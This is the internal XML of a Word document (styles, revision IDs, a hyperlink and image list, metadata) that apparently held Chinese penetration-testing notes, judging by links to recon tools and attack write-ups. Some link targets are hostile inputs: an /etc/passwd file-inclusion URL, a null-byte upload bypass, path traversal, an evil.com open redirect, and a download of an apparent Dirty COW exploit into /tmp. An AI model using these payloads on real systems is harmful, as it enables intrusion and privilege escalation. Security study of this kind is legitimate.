    <w:rsid w:val="000A449A"/>
    <w:rsid w:val="000C1FDE"/>
    <w:rsid w:val="000C3152"/>
    <w:rsid w:val="000D5101"/>
    <w:rsid w:val="001011AF"/>
    <w:rsid w:val="00103D75"/>
    <w:rsid w:val="00126765"/>
    <w:rsid w:val="0013189A"/>
    <w:rsid w:val="00162B31"/>
    <w:rsid w:val="001646FC"/>
    <w:rsid w:val="00164719"/>
    <w:rsid w:val="00164D08"/>
    <w:rsid w:val="001815CA"/>
    <w:rsid w:val="00191C2D"/>
    <w:rsid w:val="00192BFF"/>
    <w:rsid w:val="00196C94"/>
    <w:rsid w:val="001B23D2"/>
    <w:rsid w:val="001C2F72"/>
    <w:rsid w:val="001C373D"/>
    <w:rsid w:val="001D58EC"/>
    <w:rsid w:val="001F3D17"/>
    <w:rsid w:val="002035DC"/>
    <w:rsid w:val="002110F6"/>
    <w:rsid w:val="00230607"/>
    <w:rsid w:val="002A3401"/>
    <w:rsid w:val="002A5D7C"/>
    <w:rsid w:val="002B554F"/>
    <w:rsid w:val="002B71AE"/>
    <w:rsid w:val="002D5237"/>
    <w:rsid w:val="002D6C60"/>
    <w:rsid w:val="00336BC5"/>
    <w:rsid w:val="0034210A"/>
    <w:rsid w:val="003439C6"/>
    <w:rsid w:val="0035107E"/>
    <w:rsid w:val="003630CF"/>
    <w:rsid w:val="00367951"/>
    <w:rsid w:val="003719B2"/>
    <w:rsid w:val="0038154F"/>
    <w:rsid w:val="003853C3"/>
    <w:rsid w:val="0039199F"/>
    <w:rsid w:val="00394403"/>
    <w:rsid w:val="003C3D8B"/>
    <w:rsid w:val="0045396C"/>
    <w:rsid w:val="00456CC1"/>
    <w:rsid w:val="00460537"/>
    <w:rsid w:val="004657EF"/>
    <w:rsid w:val="0048048C"/>
    <w:rsid w:val="00483503"/>
    <w:rsid w:val="004A36CF"/>
    <w:rsid w:val="004F1A15"/>
    <w:rsid w:val="004F65C1"/>
    <w:rsid w:val="00511EEF"/>
    <w:rsid w:val="0052486C"/>
    <w:rsid w:val="00531A8E"/>
    <w:rsid w:val="005474CB"/>
    <w:rsid w:val="00562437"/>
    <w:rsid w:val="00577B8E"/>
    <w:rsid w:val="00582F10"/>
    <w:rsid w:val="005A3EC1"/>
    <w:rsid w:val="005B74A2"/>
    <w:rsid w:val="005C3B9B"/>
    <w:rsid w:val="005C4DB7"/>
    <w:rsid w:val="005D4F36"/>
    <w:rsid w:val="00620C12"/>
    <w:rsid w:val="00622ABA"/>
    <w:rsid w:val="00664EC7"/>
    <w:rsid w:val="006738C8"/>
    <w:rsid w:val="006B3FE4"/>
    <w:rsid w:val="006D676B"/>
    <w:rsid w:val="006E5E33"/>
    <w:rsid w:val="006F7A6B"/>
    <w:rsid w:val="00702405"/>
    <w:rsid w:val="00710E59"/>
    <w:rsid w:val="00726D22"/>
    <w:rsid w:val="00735F30"/>
    <w:rsid w:val="00744980"/>
    <w:rsid w:val="00773E0B"/>
    <w:rsid w:val="0078275F"/>
    <w:rsid w:val="00797674"/>
    <w:rsid w:val="007A3227"/>
    <w:rsid w:val="007B700F"/>
    <w:rsid w:val="007E2CAE"/>
    <w:rsid w:val="007F5999"/>
    <w:rsid w:val="007F7103"/>
    <w:rsid w:val="008027AB"/>
    <w:rsid w:val="0082359F"/>
    <w:rsid w:val="00830512"/>
    <w:rsid w:val="00850C93"/>
    <w:rsid w:val="00851549"/>
    <w:rsid w:val="00863453"/>
    <w:rsid w:val="00864742"/>
    <w:rsid w:val="008756F8"/>
    <w:rsid w:val="00877529"/>
    <w:rsid w:val="00892C98"/>
    <w:rsid w:val="008C4CAF"/>
    <w:rsid w:val="008C6A82"/>
    <w:rsid w:val="008D2631"/>
    <w:rsid w:val="008D2A0E"/>
    <w:rsid w:val="008E7CBA"/>
    <w:rsid w:val="008F0A7A"/>
    <w:rsid w:val="008F3489"/>
    <w:rsid w:val="008F5DDF"/>
    <w:rsid w:val="00907A06"/>
    <w:rsid w:val="00921670"/>
    <w:rsid w:val="009415C3"/>
    <w:rsid w:val="0094298A"/>
    <w:rsid w:val="00951B28"/>
    <w:rsid w:val="009534B4"/>
    <w:rsid w:val="0095496E"/>
    <w:rsid w:val="00972178"/>
    <w:rsid w:val="00982F28"/>
    <w:rsid w:val="0098533C"/>
    <w:rsid w:val="009B1D8E"/>
    <w:rsid w:val="009B36FD"/>
    <w:rsid w:val="009D12C4"/>
    <w:rsid w:val="00A14128"/>
    <w:rsid w:val="00A2689C"/>
    <w:rsid w:val="00A40993"/>
    <w:rsid w:val="00A42238"/>
    <w:rsid w:val="00A448A4"/>
    <w:rsid w:val="00A538A2"/>
    <w:rsid w:val="00A930EC"/>
    <w:rsid w:val="00AB2B16"/>
    <w:rsid w:val="00AD1608"/>
    <w:rsid w:val="00AD3AAE"/>
    <w:rsid w:val="00B240C0"/>
    <w:rsid w:val="00B356D4"/>
    <w:rsid w:val="00B3698D"/>
    <w:rsid w:val="00B403D9"/>
    <w:rsid w:val="00B43685"/>
    <w:rsid w:val="00B5008B"/>
    <w:rsid w:val="00B54C43"/>
    <w:rsid w:val="00B74DED"/>
    <w:rsid w:val="00B81EF1"/>
    <w:rsid w:val="00B92472"/>
    <w:rsid w:val="00BB29BE"/>
    <w:rsid w:val="00BC34FC"/>
    <w:rsid w:val="00BC3FCD"/>
    <w:rsid w:val="00BF52E4"/>
    <w:rsid w:val="00C00103"/>
    <w:rsid w:val="00C03BAD"/>
    <w:rsid w:val="00C314AE"/>
    <w:rsid w:val="00C406D8"/>
    <w:rsid w:val="00C51675"/>
    <w:rsid w:val="00C62106"/>
    <w:rsid w:val="00C72D9D"/>
    <w:rsid w:val="00C75246"/>
    <w:rsid w:val="00C804F3"/>
    <w:rsid w:val="00CA2DA4"/>
    <w:rsid w:val="00CA4616"/>
    <w:rsid w:val="00CA7E51"/>
    <w:rsid w:val="00CB3A3A"/>
    <w:rsid w:val="00CD3AF6"/>
    <w:rsid w:val="00CE5F8F"/>
    <w:rsid w:val="00D11994"/>
    <w:rsid w:val="00D52FDC"/>
    <w:rsid w:val="00D53C32"/>
    <w:rsid w:val="00D54804"/>
    <w:rsid w:val="00D7298B"/>
    <w:rsid w:val="00D75791"/>
    <w:rsid w:val="00D950EE"/>
    <w:rsid w:val="00D97F5F"/>
    <w:rsid w:val="00E0097B"/>
    <w:rsid w:val="00E03C8D"/>
    <w:rsid w:val="00E13132"/>
    <w:rsid w:val="00E422F6"/>
    <w:rsid w:val="00E605F2"/>
    <w:rsid w:val="00EA5F02"/>
    <w:rsid w:val="00EB3504"/>
    <w:rsid w:val="00EF06F7"/>
    <w:rsid w:val="00F33CED"/>
    <w:rsid w:val="00F3602C"/>
    <w:rsid w:val="00F450A0"/>
    <w:rsid w:val="00F6706B"/>
    <w:rsid w:val="00F76936"/>
    <w:rsid w:val="00F823C0"/>
    <w:rsid w:val="00F91404"/>
    <w:rsid w:val="00F922B5"/>
    <w:rsid w:val="00FA7087"/>
    <w:rsid w:val="00FB2EB8"/>
    <w:rsid w:val="00FB531E"/>
    <w:rsid w:val="00FB6A41"/>
    <w:rsid w:val="00FC269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DC9B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BB7039E7-DBF4-4422-847B-075F713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B3A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6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31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3A3A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80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804F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804F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7298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72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7A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5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54F"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CA2DA4"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00A4223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B3FE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B36FD"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009B36FD"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000A449A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="l0">
    <w:name w:val="l0"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00BB2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B29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BB29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BB29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002D6C60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00851549"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1loh5">
    <w:name w:val="_1loh_5"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BC3FCD"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="builtin">
    <w:name w:val="built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BC34FC"/>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00BC34FC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008F5DDF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008F5DDF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E1313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iplookup.com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stool.chinaz.com/same" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GerbenJavado/LinkFinder" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anquanke.com/post/id/93878" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/index.php?page=/etc/passwd" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bilibili.com/video/av33026520/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lijiejie/subDomainsBrute" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aizhan.com/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId102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hyperlink" Target="http://www.xxx.com/1.jpg%00" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freeerror.org/d/461" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wepcc.com/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraft.com/site_report?url=" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EnableSecurity/wafw00f" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.gif"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bgp.he.net/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aboul3la/Sublist3r" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/robertdavidgraham/masscan" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whatweb.bugscaner.com/look" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/192063.html" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/201790.html" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=Windows&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External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91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bbs.ichunqiu.com/thread-54849-1-1.html" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://j0k3r.top/2018/01/30/file-up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sm.ca.com/en/ping.php" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraft.com/site_report?url=" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.99/dirty.c%20-O%20/tmp/dirty.c" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whois.chinaz.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ekultek/WhatWaf" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/6594" TargetMode="External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73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://1.1.1.1/../../../../dir/file.txt" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/219/" TargetMode="External"/><Relationship Id="rId101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bbs.ichunqiu.com/forum.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qichacha.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/7kbstorm/7kbscan-WebPathBrute" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.panduoduo.net/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www.baidu.com/s?wd=2K&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/188464.html" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.t00ls.net/articles-46165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hyperlink" Target="https://blog.51cto.com/wt7315/18631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rt.sh/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ipip.net/dns.php" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/maurosoria/dirsearch" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.dyboy.cn/websecurity/160.html" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/qq_36119192/article/details/99871667" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli-labs-master/Less-8/?id=1" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.beianbeian.com/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.panduoduo.net/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=95&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="/nb/15176424" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/huanghelouzi/article/details/82995313" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ichunqiu.com/battalion?t=2&amp;r=54399" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/zhaijiahui/p/8459661.html" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.k0rz3n.com/2018/11/20/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8B%20PHP%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.51cto.com/wt7315/18655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3xp10it/xcdn" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stool.chinaz.com/same" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Threezh1/JSFinder" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli-labs-master/Less-8/?id=1" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thief.one/2017/04/10/2/" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bilibili.com/video/av88459896?from=search&amp;seid=12563701269010581597" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shmilylty/OneForAll" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shuimugan.com/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.&#20027;&#26426;&#21517;" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.landgrey.me/redirect.php?url=http://www.landgrey.me.www.evil.com/untru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9817-953A-45CB-AA10-72C06C2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1</TotalTime>
  <Pages>46</Pages>
  <Words>4617</Words>
  <Characters>26318</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>219</Lines>
  <Paragraphs>61</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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u feng</cp:lastModifiedBy>
  <cp:revision>91</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-12T14:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-25T03:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>